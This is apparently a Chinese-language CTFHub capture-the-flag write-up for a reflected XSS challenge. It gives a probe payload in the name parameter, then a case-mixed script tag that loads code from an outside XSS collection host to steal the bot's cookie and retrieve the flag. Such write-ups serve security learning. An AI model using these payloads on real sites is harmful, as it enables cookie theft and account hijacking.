反射型(CTFHUB)
在上面输入什么名字,名字就会显示在URL和Hello,后面,插入XSS语句后成功
http://challenge-e16161e0e689d137.sandbox.ctfhub.com:10800/?name=<script>alert(1)</script>
将XSS语句插入第二个输入框中,发现需要一定格式才可以,于是我猜想将该网址的URL赋值进去,并且对name参数进行修改,将原本的xss语句变成xss平台的语句接受就好了
所以构造如下语句,得到flag
http://challenge-e16161e0e689d137.sandbox.ctfhub.com:10800/?name=<sCRiPt sRC=//xs.pe/HyM></sCrIpT>